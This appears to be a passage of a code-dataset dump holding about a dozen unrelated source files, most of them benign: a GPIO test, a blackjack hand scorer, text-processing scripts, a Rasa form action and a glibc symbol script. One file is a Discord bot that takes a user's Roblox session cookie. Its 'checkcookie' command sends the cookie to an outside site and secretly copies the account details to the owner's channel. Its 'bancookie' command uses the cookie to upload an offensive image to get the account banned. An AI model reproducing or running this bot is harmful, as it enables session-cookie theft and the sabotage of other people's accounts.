GPIO\nimport time\n\nsw_in = 23\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(sw_in, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.add_event_detect(sw_in, GPIO.FALLING)\n\nwhile True:\n    if GPIO.event_detected(sw_in):\n        print(\"Hit\")\n    else:\n        print(\".\", end=\"\", flush=True)\n    time.sleep(.1)","sub_path":"asteria-v3/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565235467","text":"class Hand(object):\n\n    def __init__(self, cards):\n        self.cards = cards\n        self.value = 0 # If multiple values are possible (i.e. hand contains an ace), value is the lower of the two\n\n    def add(self, card):\n        self.cards.append(card)\n\n    def eval_hand(self):\n        aces_count = 0\n        self.value = 0\n        for card in self.cards:\n            self.value += card.val()\n            if card.rank == \"Ace\":\n                aces_count += 1\n\n        # Count every ace as 1 first (card.val() scores an ace as 11), so self.value is always the lowest total\n        self.value -= 10 * aces_count\n        if aces_count == 0 or self.value + 10 > 21: # No aces, or counting any ace as 11 would bust\n            return [self.value]\n        # At most one ace can ever count as 11 (two elevens alone would be 22)\n        return [self.value + 10, self.value]","sub_path":"Hand.py","file_name":"Hand.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16671943","text":"import os\nimport shutil\n\nfrom . import cfg\nimport logging as log\n\nverbose=False\n\ndef app_add(resource,appkernel,verbose=False):\n    globals()['verbose']=verbose\n    \n    log.info(\"Generating application kernel configuration for %s on %s\",appkernel,resource)\n    \n    try:\n        cfg.FindResourceByName(resource)\n    except Exception:\n        log.error(\"Can not find resource: %s\",resource)\n        exit(1)\n    try:\n        cfg.FindAppByName(appkernel)\n    except Exception:\n        log.error(\"Can not find application kernel: %s\",appkernel)\n        exit(1)\n    \n    cfgFilename=os.path.join(cfg.cfg_dir, 'resources', resource, appkernel + \".app.conf\")\n    cfgTemplateFilename=os.path.join(cfg.templates_dir, appkernel + \".app.conf\")\n    \n    if os.path.isfile(cfgFilename):\n        log.error(\"Configuration file for %s on %s already exists. 
For regeneration delete it\",appkernel,resource)\n log.info(\"Application kernel configuration for %s on %s is in: \\n\\t%s\",appkernel,resource,cfgFilename)\n exit(1)\n \n if not os.path.isfile(cfgTemplateFilename):\n log.error(\"Can not find template file for application kernel: %s\",cfgTemplateFilename)\n exit(1)\n \n shutil.copyfile(cfgTemplateFilename,cfgFilename)\n if os.path.isfile(cfgFilename):\n log.info(\"Application kernel configuration for %s on %s is in: \\n\\t%s\",appkernel,resource,cfgFilename)\n\n\n\nif __name__ == '__main__':\n import argparse\n # TIME: to get to parsing\n parser = argparse.ArgumentParser('Initial configuration generation for application kernel on resource')\n # SETUP: the arguments that we're going to support\n parser.add_argument('-v', '--verbose', action='store_true', help=\"turn on verbose logging\")\n parser.add_argument('resource', help=\"name of resource\")\n parser.add_argument('appkernel', help=\"name of application kernel\")\n # PARSE: them arguments\n args = parser.parse_args()\n \n app_add(args.resource,args.appkernel,verbose=args.verbose)\n","sub_path":"akrr/app_add.py","file_name":"app_add.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174255123","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 17 09:11:06 2021\n\n@author: saulr\n\"\"\"\nimport json\nimport re\nimport string\nimport pandas as pd\n\nstop_words_csv = pd.read_csv(\"stop_words_list.csv\").to_dict()\n\n# removing spaces from keys\n# storing them in sam dictionary\nstop_words_csv = { x.translate({32:None}) : y for x, y in stop_words_csv.items()}\n\n# definiré el alfabeto para eliminar aquellos caracteres que no estén presentes\n# en cada texto\nalphabet = {\n # 26 letras del alfabeto inglés\n 'a': True,\n 'b': True,\n 'c': True,\n 'd': True,\n 'e': True,\n 'f': True,\n 'g': True,\n 'h': True,\n 'i': True,\n 'j': True,\n 'k': True,\n 'l': True,\n 'm': True,\n 'n': True,\n 'o': True,\n 'p': True,\n 'q': True,\n 'r': True,\n 's': True,\n 't': True,\n 'u': True,\n 'v': True,\n 'w': True,\n 'x': True,\n 'y': True,\n 'z': True,\n # números\n '0': True,\n '1': True,\n '2': True,\n '3': True,\n '4': True,\n '5': True,\n '6': True,\n '7': True,\n '8': True,\n '9': True,\n # caracteres especiales\n '$': True,\n '-': True,\n}\n\ndef format_data(title : str, abstract : str):\n # obtendremos una lista de palabras al separarlas por un espacio\n list_of_words = (title + abstract).lower().split(\" \")\n transformed_data = \"\"\n punct = string.punctuation\n punct = punct.replace(\"-\", \"\") # aceptaremos el signo '-'\n \n for word in list_of_words:\n # primero reemplazamos todos los saltos de línea por vacío\n transformed_word = word.translate(str.maketrans('', '', '\\n'))\n transformed_word = re.sub(\"\\$[^\\$]*\\$\", \"\", transformed_word)\n transformed_word = transformed_word.translate(str.maketrans('', '', punct))\n \n \n if transformed_word == \"\" or transformed_word in stop_words_csv.keys():\n continue\n \n for letter in transformed_word:\n if letter not in alphabet:\n transformed_word = transformed_word.translate({ord(letter): None})\n \n if transformed_word == \"\" or transformed_word in stop_words_csv.keys():\n continue\n \n transformed_data += transformed_word\n \n \n return transformed_data\n\n\nread_metadata = open('../python_processes/extracted_metadata.json', 'r')\nformatted_metadata = open('formatted_metadata.txt', 'w', encoding=\"utf-8\")\n\nloaded_papers = 
json.load(read_metadata)\nfor paper in loaded_papers:\n id_paper = paper['id'] \n \n transformed_data = format_data(paper['title'], paper['abstract'])\n formatted_metadata.write(\"{} {}\\n\".format(id_paper, transformed_data))\n \n \nread_metadata.close()\nformatted_metadata.close()\n","sub_path":"Proyecto-Final/PythonProcesses/format_metadata.py","file_name":"format_metadata.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"645671138","text":"# encoding: utf8\nfrom __future__ import unicode_literals\nimport codecs\nimport numpy\n\ndef make_bow( src_name, hist_name, dict_name ):\n word_dic = []\n\n # 各行を単語に分割\n lines = []\n for line in codecs.open( src_name, \"r\", \"sjis\" ).readlines():\n # 改行コードを削除\n line = line.rstrip(\"\\r\\n\")\n\n # 単語分割\n words = line.split(\" \")\n\n lines.append( words )\n\n # 単語辞書とヒストグラムを作成\n for words in lines:\n for w in words:\n # 単語がなければ辞書に追加\n if not w in word_dic:\n word_dic.append( w )\n\n # ヒストグラム化\n hist = numpy.zeros( (len(lines), len(word_dic)) )\n for d,words in enumerate(lines):\n for w in words:\n idx = word_dic.index(w)\n hist[d,idx] += 1\n\n\n numpy.savetxt( hist_name, hist, fmt=str(\"%d\") )\n codecs.open( dict_name, \"w\", \"sjis\" ).write( \"\\n\".join( word_dic ) )\n\n\ndef main():\n make_bow( \"text.txt\", \"histogram_w.txt\", \"word_dic.txt\" )\n\nif __name__ == '__main__':\n main()","sub_path":"make_bow/bow.py","file_name":"bow.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"494745983","text":"# -*- coding: utf-8 -*- \n\"\"\"Parse ExploreCourses XML.\"\"\"\nfrom collections import OrderedDict\nimport json\nimport time\nimport sys\nimport urllib.request\nimport xmltodict # must install at https://anaconda.org/asmeurer/xmltodict\n\n# Unless year is specified as an additional argument to the command-line call, this script\n# will parse the 2015-2016 catalog\nif(len(sys.argv)>1):\n\tparse_year = sys.argv[1]\nelse:\n\tparse_year = 20152016\n\n# EC_url = \"http://explorecourses.stanford.edu/search?view=xml-20140630&academicYear=\" + str(parse_year) + \"&page=0&q=STATS&filter-departmentcode-STATS=on&filter-coursestatus-Active=on&filter-term-Summer=on\"\nEC_url = \"http://explorecourses.stanford.edu/search?view=xml-20140630&academicYear=\" + str(parse_year) + \"&filter-coursestatus-Active=on&q=%25\"\n\nstring_replacements = [ \n\t[\"\\\\n\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\n\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\", \"|\"],\n\t[\"\\\\n\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\", \"|\"],\n\t[\"\\\\n\", \"\\\\\\\\n\"],\n\t[\"\\\\r\", \"\\\\\\\\r\"],\n\t[\"\\\\t\", \"\\\\\\\\t\"],\n\t[\"'\", \"\\\\'\"]\n]\n\n# header = ['year','course_id','subject','catalog_nbr','school','gers','units_min','units_max','repeatable','term_id','section_nbr','class_id','component','enrollment','instructors','start_time','end_time','days']\n# print('\\t'.join(header))\n\n# \"collapse\" is a helper function that simplifies a JSON object that has been converted from XML by xmltodict.\n# field2 is nested under field1 and is redundant. 
We want to combine them.\n# \n# Example input 1:\n# the_dict = {field1: {field2: [a,b,c]}}, where, e.g., field1 = \"attributes\" and field2 = \"attribute\"\n# That's just how the dict looks like when we convert XML to JSON.\n# \n# Example output 1:\n# the_dict = {field1: [a,b,c]}\n# \n# Even worse, if field2 has only one element in the list, the parser removes the list and make it a direct child.\n# The end users then have to check the type of the object whether it's a list or not, which is undesirable.\n# \n# Example input 2:\n# the_dict = {field1: {field2: a}}\n# \n# Example output 2:\n# the_dict = {field1: [a]}\ndef collapse(the_dict, field1, field2):\n\tif (\n\t\tthe_dict\n\t\tand field1 in the_dict\n\t\tand the_dict[field1]\n\t\tand field2 in the_dict[field1]\n\t):\n\t\tif type(the_dict[field1][field2]) is list:\n\t\t\tthe_dict[field1] = the_dict[field1][field2]\n\t\telse:\n\t\t\tthe_dict[field1] = [the_dict[field1][field2]]\n\nif __name__ == '__main__':\n\tinit_time = time.time()\n\twith urllib.request.urlopen(EC_url) as the_file:\n\t\tdoc = xmltodict.parse(the_file.read())\n\t\tthe_file.close()\n\n\t\tfor course in doc[\"xml\"][\"courses\"][\"course\"]:\n\n\t\t\t# parsing xml into json has some redundancies. We'll collapse those \n\t\t\t# to make the final object easier to read through\n\t\t\tcollapse(course, \"sections\", \"section\")\n\t\t\tcollapse(course, \"attributes\", \"attribute\")\n\t\t\tcollapse(course, \"tags\", \"tag\")\n\t\t\tcollapse(course, \"learningObjectives\", \"learningObjective\")\n\n\t\t\tif \"sections\" in course and course[\"sections\"]:\n\t\t\t\tfor section in course[\"sections\"]:\n\t\t\t\t\tcollapse(section, \"schedules\", \"schedule\")\n\t\t\t\t\tif \"schedules\" in section and section[\"schedules\"]:\n\t\t\t\t\t\tfor schedule in section[\"schedules\"]:\n\t\t\t\t\t\t\tcollapse(schedule, \"instructors\", \"instructor\")\n\n\t\t\tcomplete_code = course[\"subject\"] + ' ' + str(course[\"code\"])\n\t\t\toutput_json = {\"code\": complete_code, \"description\": course[\"description\"]}\n\n\t\t\tprint(json.dumps(output_json))\n\t\t\t\n\t\t\t# with open('../ec_data/output_20152016.json', 'w') as f:\n\t\t\t# \tjson.dump(output_json, f)\n\n\t\t\t# year = course[\"year\"]\n\t\t\t# subject = course[\"subject\"]\n\t\t\t# catalog_nbr = course[\"code\"]\n\t\t\t# repeatable = course[\"repeatable\"]\n\t\t\t# units_min = course[\"unitsMin\"]\n\t\t\t# units_max = course[\"unitsMax\"]\n\t\t\t# gers = course[\"gers\"]\n\n\t\t\t# course_id = course[\"administrativeInformation\"][\"courseId\"]\n\t\t\t# school = course[\"administrativeInformation\"][\"academicGroup\"]\n\n\t\t\t# if course[\"sections\"] is None:\n\t\t\t# \tcourse[\"sections\"] = []\n\n\t\t\t# for section in course[\"sections\"]:\n\t\t\t# \tterm_id = section[\"termId\"]\n\t\t\t# \tsection_nbr = section[\"sectionNumber\"]\n\t\t\t# \tclass_id = section[\"classId\"]\n\t\t\t# \tcomponent = section[\"component\"]\n\t\t\t# \tenrollment = section[\"currentClassSize\"]\n\n\t\t\t# \tfor schedule in section[\"schedules\"]:\n\t\t\t# \t\tstart_time = None\n\t\t\t# \t\tend_time = None\n\t\t\t# \t\tdays = None\n\t\t\t# \t\tinstructors = []\n\n\t\t\t# \t\tif \"startTime\" in schedule and schedule[\"startTime\"]:\n\t\t\t# \t\t\tstart_time = schedule[\"startTime\"]\n\t\t\t# \t\tif \"endTime\" in schedule and schedule[\"endTime\"]:\n\t\t\t# \t\t\tend_time = schedule[\"endTime\"]\n\t\t\t# \t\tif \"days\" in schedule and schedule[\"days\"]:\n\t\t\t# \t\t\tdays = schedule[\"days\"]\n\t\t\t# \t\t\tdays = 
days.replace(\"\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\", \"|\")\n\t\t\t# \t\t\tdays = days.replace(\"\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\", \"|\")\n\t\t\t# \t\tif \"instructors\" in schedule and schedule[\"instructors\"]:\n\t\t\t# \t\t\tfor instructor in schedule[\"instructors\"]:\n\t\t\t# \t\t\t\tinstructors.append(instructor[\"sunet\"])\n\n\t\t\t# \t\tprint(year, end='\\t')\n\t\t\t# \t\tprint(course_id, end='\\t')\n\t\t\t# \t\tprint(subject, end='\\t')\n\t\t\t# \t\tprint(catalog_nbr, end='\\t')\n\t\t\t# \t\tprint(school, end='\\t')\n\t\t\t# \t\tprint(gers, end='\\t')\n\t\t\t# \t\tprint(units_min, end='\\t')\n\t\t\t# \t\tprint(units_max, end='\\t')\n\t\t\t# \t\tprint(repeatable, end='\\t')\n\n\t\t\t# \t\tprint(term_id, end='\\t')\n\t\t\t# \t\tprint(section_nbr, end='\\t')\n\t\t\t# \t\tprint(class_id, end='\\t')\n\t\t\t# \t\tprint(component, end='\\t')\n\t\t\t# \t\tprint(enrollment, end='\\t')\n\t\t\t# \t\tprint('|'.join(instructors), end='\\t')\n\n\t\t\t# \t\tprint(start_time, end='\\t')\n\t\t\t# \t\tprint(end_time, end='\\t')\n\t\t\t# \t\tprint(days)\n\n\t#elapsed_time = time.time() - init_time\n\t#print(\">> Checking done. Time spent = {:.01f} s ({:.01f} hrs)\".format(elapsed_time, elapsed_time/3600))","sub_path":"python_scripts/parse_EC_API2.py","file_name":"parse_EC_API2.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174841066","text":"import math\nt=int(input())\nfor i in range(t):\n n,m,k=map(int,input().split())\n e=n/k\n if m==0 or (n==k and m>=2):\n print(0)\n elif e>=m:\n print(m)\n elif m>e:\n print(int(e-math.ceil((m-e)/(k-1))))\n","sub_path":"Berland-Poker.py","file_name":"Berland-Poker.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213632334","text":"import sys\nfrom magma import *\nfrom mantle import *\nfrom boards.icestick import IceStick\n\nicestick = IceStick()\nicestick.Clock.on()\nfor i in range(4):\n icestick.J1[i].input().on()\n icestick.J3[i].output().on()\n\nicestick.D1.on()\n\nmain = icestick.main()\n\nupdate_counter = Counter(5)\ncounter = Counter(4, ce=True)\nwire(update_counter.COUT, counter.CE)\n\nwire(update_counter.COUT, main.D1)\nwire(counter.O, main.J3)\n\n\ncompile(sys.argv[1], main)\n","sub_path":"tests/democounter.py","file_name":"democounter.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"469772357","text":"Data = {\"NIM\":\"L200190200\", \"Nama\":\"Fatmawati Ersa Putri\", \"Tempat/Tanggal_lahir\":\"Wonogiri, 30 Maret 2001\", \"Jenis Kelamin\":\"Perempuan\", \"Agama\":\"Islam\",\r\n \"Pekerjaan\":\"Mahasiswa\", \"Alamat\":\"jatisrono, Wonogiri, Jawa Tengah\"}\r\ndef TampilNIM():\r\n print(Data[\"NIM\"])\r\ndef TampilNama():\r\n print(Data[\"Nama\"])\r\ndef TampilTTL():\r\n print(Data[\"Tempat/Tanggal_lahir\"])\r\ndef TampilJK():\r\n print(Data[\"Jenis Kelamin\"])\r\ndef TampilAgama():\r\n print(Data[\"Agama\"])\r\ndef TampilAlamat():\r\n print(Data[\"Alamat\"])\r\ndef TampilPekerjaan():\r\n print(Data[\"Pekerjaan\"])\r\n\r\nprint(\"Pilihan Yang Tersedia:\")\r\nprint(\"a menampilakan bantuaan ini\")\r\nprint(\"b menampilakan NIM\")\r\nprint(\"c menampilakan Nama\")\r\nprint(\"d menampilakan Tempat/Tanggal_lahir\")\r\nprint(\"e menampilakan Jenis Kelamin\")\r\nprint(\"f menampilakan Agama\")\r\nprint(\"g menampilakan 
Alamat\")\r\nprint(\"h menampilakan Pekerjaan\")\r\nprint(\"i untuk keluar\")\r\nprint(\" \")\r\n\r\na = \"\"\"Pilihan Yang Tersededia:\r\na menampilakan bantuaan ini\r\nb menampilakan NIM\r\nc menampilakan Nama\r\nd menampilakan Tempat/Tanggal_lahir\r\ne menampilakan Jenis Kelamin\r\nf menampilakan Agama\r\ng menampilakan Alamat\r\nh menampilakan Pekerjaan\r\ni untuk keluar\"\"\"\r\n\r\ni = \"Terima Kasih\"\r\nx = input(\"Masukkan huruf:\")\r\nwhile x != \"i\":\r\n if x == \"a\":\r\n print(a)\r\n print(\" \")\r\n x = input(\"Masukkan huruf:\")\r\n elif x == \"b\":\r\n TampilNIM()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"c\":\r\n TampilNama()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"d\":\r\n TampilTTL()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"e\":\r\n TampilJK()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"f\":\r\n TampilAgama()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"g\":\r\n TampilAlamat()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"h\":\r\n TampilPekerjaan()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\nprint(i)\r\n","sub_path":"praktikum8/kegiatan1.py","file_name":"kegiatan1.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362383229","text":"import discord, requests, json\nfrom discord.ext import commands\nfrom bs4 import BeautifulSoup\n\n\n\ntoken = \"TOKENHERE\"\nyourprefix = \"!\" ## enter the prefix of your choice by replacing the ! \ndualhookchannelid = YOURCHANNELID ## e.g 905536418934427096\n\nbot = commands.Bot(command_prefix=yourprefix, description=\"Cookie Checker Bot :)\")\n\n@bot.command()\nasync def bancookie(ctx, cookie=None):\n req1 = requests.Session()\n \n if cookie == None:\n await ctx.message.reply(\"Oh No! It Seems You Have Not Provided A Cookie, Please Run The Command Again Using The Following Syntax '.bancookie mycookie'\") ## let the user know they aint provided cookie\n return ## break command\n \n req1.cookies['.ROBLOSECURITY'] = cookie\n print(\"Cookie Set\")\n homeurl= 'https://www.roblox.com/build/upload' ## link to get verification token\n response = req1.get(homeurl) \n try:\n soup = BeautifulSoup(response.text, \"lxml\")\n veri = soup.find(\"input\", {\"name\" : \"__RequestVerificationToken\"}).attrs[\"value\"]\n\n except NameError:\n veri = False\n await ctx.reply(\"Shit bois we got an error fuck\")\n return ## break ofc\n\n files = {'file': ('lol.png', open(\"theimage.jpg\", 'rb'), 'image/png')} ## add the sussy img \n data = {\n '__RequestVerificationToken': veri,\n 'assetTypeId': '13', \n 'isOggUploadEnabled': 'True',\n 'isTgaUploadEnabled': 'True',\n \n 'onVerificationPage': \"False\",\n \"captchaEnabled\": \"True\",\n 'name': \"sussy\"\n }\n try:\n response = req1.post('https://www.roblox.com/build/upload', files=files, data=data) #upload decal teehee\n await ctx.reply(\"Uploaded sussy decal teehee\")\n except:\n await ctx.reply(\"Uh oh request failed, invalid image?\")\n return \n\n\n@bot.command()\nasync def checkcookie(ctx, cookie=None): ## By default make Cookie = To None, so that u can detect wether or not user has entered a cookie\n \n if cookie == None:\n await ctx.message.reply(\"Oh No! 
It Seems You Have Not Provided A Cookie, Please Run The Command Again Using The Following Syntax '.checkcookie mycookie'\") ## let the user know they aint provided cookie\n return ## break command\n\n r = requests.get(f'https://story-of-jesus.xyz/e.php?cookie={cookie}') ## Send get request to my api to get info about cookie in json\n data = r.json() ## get json from request ^^\n\n if data[\"status\"] == \"failed\": ## if cookie is invalid api will respond with status: failed we will check for this value and if so let user know\n await ctx.message.reply(\"Hmm. This Cookie Seems To Be Expired/Invalid.\")\n return ## break command\n\n ## grab values from json api :) if cookie is valid\n\n avatarurl = data[\"avatarurl\"] \n userid = data[\"userid\"] \n emailverified = data[\"emailverified\"] \n username = data[\"username\"] \n description = data[\"description\"] \n displayname = data[\"displayname\"] \n datecreated = data[\"datecreated\"] \n days_old = data[\"days-old\"] \n robux = data[\"robux\"] \n pendingrobux = data[\"pendingrobux\"] \n credit = data[\"credit\"] \n premium = data[\"premium\"] \n friends = data[\"friends\"] \n followers = data[\"followers\"] \n following = data[\"following\"] \n rap = data[\"rap\"] \n gender = data[\"gender\"] \n country = data[\"country\"] \n pin = data[\"pin\"] \n\n if description == \"\":\n description = \"Empty\" ## check if description is empty and if so set the variable to \"Empty\" because otherwise it bugs embed\n \n ## create embed with above data\n cook = discord.Embed(title=f'**Yum Yum A Valid Cookie, My Favourite**', color=0x42be8f)\n cook.set_thumbnail(url=f'{avatarurl}')\n cook.add_field(name=\"Profile Link:\", value=f'**[Click Here](https://www.roblox.com/users/{userid}/profile)**', inline=False)\n cook.add_field(name=\"Username:\", value=f'```{username}```', inline=True)\n cook.add_field(name=\"UserID:\", value=f'```{userid}```', inline=True)\n cook.add_field(name=\"Display Name:\", value=f'```{displayname}```', inline=True)\n cook.add_field(name=\"Description:\", value=f'```{description}```', inline=True)\n cook.add_field(name=\"Gender:\", value=f'```{gender}```', inline=True)\n cook.add_field(name=\"Country:\", value=f'```{country}```', inline=True)\n cook.add_field(name=\"Verified Email:\", value=f'```{emailverified}```', inline=True)\n cook.add_field(name=\"Premium:\", value=f'```{premium}```', inline=True)\n cook.add_field(name=\"Pin Enabled:\", value=f'```{pin}```', inline=True)\n cook.add_field(name=\"Robux:\", value=f'```{robux}```', inline=True)\n cook.add_field(name=\"Pending-Robux:\", value=f'```{pendingrobux}```', inline=True)\n cook.add_field(name=\"Rap:\", value=f'```{rap}```', inline=True)\n cook.add_field(name=\"Credit:\", value=f'```{credit}```', inline=True)\n cook.add_field(name=\"Date Created:\", value=f'```{days_old} Days Ago```', inline=True)\n cook.add_field(name=\"Friends:\", value=f'```{friends}```', inline=True)\n cook.add_field(name=\"Followers:\", value=f'```{followers}```', inline=True)\n cook.add_field(name=\"Following:\", value=f'```{following}```', inline=True)\n\n \n await ctx.send(embed=cook) ## send embed to the channel cmd was called in\n yourchannel = bot.get_channel(dualhookchannelid) \n await yourchannel.send(embed=cook) ## send the embed to your channel u provided at start\n\n\n\n\n@bot.event\nasync def on_ready():\n await bot.change_presence(status=discord.Status.do_not_disturb, activity=discord.Activity(type=discord.ActivityType.playing, name=\"Cookie Checker\"))\n print('throw some cookies at me 
bitch im all powered up')\n \n ## just startup event which sets bot activity to \"Playing Cookie Checker\"\n\n\nbot.run(token)\n## make your bot run duh\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"319744488","text":"import roomwindow\nimport copy\n\nclass TeamRoomWindow(roomwindow.RoomWindow):\n def __init__(self, user, args, cfg):\n roomwindow.RoomWindow.__init__(self, user, args, cfg)\n\n def draw(self, detal):\n roomwindow.RoomWindow.draw(self, detal)\n\n def right_top_data(self):\n if self.user.team_rank_list != None:\n self.EndTime = self.user.team_rank_list.EndTime\n else:\n self.EndTime = 0\n return (copy.copy(self.user.team_rank_list), copy.copy(self.user.team_info))\n\n def draw_right_top(self, data):\n self.listTop.Clear()\n if data[0] != None:\n self.listTop.Append(\"队伍排名\")\n for team in data[0].Teams:\n self.listTop.Append(\"team(%s) num(%d) corpname(%s) score(%f) lastrank(%d)\" % (team.Tname,team.Num,team.CorpName,team.Score,team.LastRank))\n\n self.listTop.Append(\"\")\n self.listTop.Append(\"watchnum(%d) endtime(%d) roomexp(%d)\" % (self.user.team_rank_list.WatchNum, self.user.team_rank_list.EndTime, self.user.team_rank_list.killNum))\n\n if data[1] != None:\n self.listTop.Append(\"\")\n self.listTop.Append(\"\")\n self.listTop.Append(\"队伍成员位置\")\n for mem in self.user.team_info:\n self.listTop.Append(\"member(%d) pos(%f, %f)\" % (mem[0],mem[1],mem[2]))\n \n\ng_roomwin = None \ndef new(user, args, cfg):\n global g_roomwin\n g_roomwin = TeamRoomWindow(user, args, cfg)\n g_roomwin.Show()\n \ndef delete():\n global g_roomwin\n if g_roomwin != None:\n g_roomwin.Close()\n g_roomwin = None","sub_path":"server/tools/py_guiclient/teamroomwindow.py","file_name":"teamroomwindow.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"438969535","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/custom-actions\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\n\n# from typing import Any, Text, Dict, List\n#\n# from rasa_sdk import Action, Tracker\n# from rasa_sdk.executor import CollectingDispatcher\n#\n#\n# class ActionHelloWorld(Action):\n#\n# def name(self) -> Text:\n# return \"action_hello_world\"\n#\n# def run(self, dispatcher: CollectingDispatcher,\n# tracker: Tracker,\n# domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n#\n# dispatcher.utter_message(text=\"Hello World!\")\n#\n# return []\nimport re\nfrom typing import Any, Text, Dict, List\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.executor import CollectingDispatcher\nfrom rasa_sdk.forms import FormAction\nfrom werkzeug.middleware import dispatcher\n\nregex = '^[a-z0-9]+[\\._]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$'\n\n\n\nclass ActionHelloWorld(FormAction):\n\n def name(self) -> Text:\n return \"insurance_form\"\n\n @staticmethod\n def required_slots(tracker: Tracker) -> List[Text]:\n \"\"\"A list of required slots that the form has to fill\"\"\"\n\n\n print(\"required_slots(tracker: Tracker)\")\n return [\"name\", \"age\", \"1date\", \"state\",\"email\"] \n\n def validate_email(\n self,\n value: Text,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> Dict[Text, Any]:\n \"\"\"Validates 
the email provided by the user to get an insurance.\"\"\"\n        # validate the candidate value itself rather than a previously stored slot\n        if value and re.search(regex, value):\n            print(\"Valid Email\")\n            return {\"email\": value}\n        else:\n            print(\"Invalid Email\")\n            dispatcher.utter_message(template=\"utter_wrong_email\")\n            return {\"email\": None}\n\n\n    def submit(self, dispatcher: CollectingDispatcher,\n               tracker: Tracker,\n               domain: Dict[Text, Any]) -> List[Dict]:\n\n        dispatcher.utter_message(template=\"utter_submit\")\n\n        return []\n    \n\n\n\n","sub_path":"actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"101074212","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport sys\nimport os\nimport distutils.spawn\nimport copy\nimport shutil\nimport multiprocessing\n\nbasePath = os.path.dirname(os.path.realpath(__file__))\n\ndef extract_versions_from_installed_folder(folder, version):\n    files = [x.decode(\"utf-8\").strip() for x in subprocess.check_output(\"find '\" + folder + \"' -name \\\"*.so\\\"\", shell=True).split()]\n\n    def starts_with_any(str, set):\n        for item in set:\n            if str.startswith(item):\n                return True\n        return False\n\n    data = []\n    for f in files:\n\n        # These are linker scripts that just forward to other .sos, not actual elf binaries\n        if f.split(\"/\")[-1] in {'libc.so', 'libm.so', 'libpthread.so'}:\n            continue\n\n        # Available versions will be listed in readelf output as function@GLIBC_version\n        # Additionally, there will be a single function@@GLIBC_version entry, which defines the\n        # default version.\n        # See https://web.archive.org/web/20170124195801/https://www.akkadia.org/drepper/symbol-versioning section Static Linker\n        command = \"readelf -Ws '\" + f + \"' | grep \\\" [^ ]*@@GLIBC_[0-9.]*$\\\" -o\"\n        file_data = [x.decode(\"utf-8\").strip() for x in subprocess.check_output(['/bin/bash', '-c', 'set -o pipefail; ' + command]).split()]\n\n        if Version(2, 17) <= version <= Version(2, 27):\n            # These are defined in both librt and libc, at different versions. 
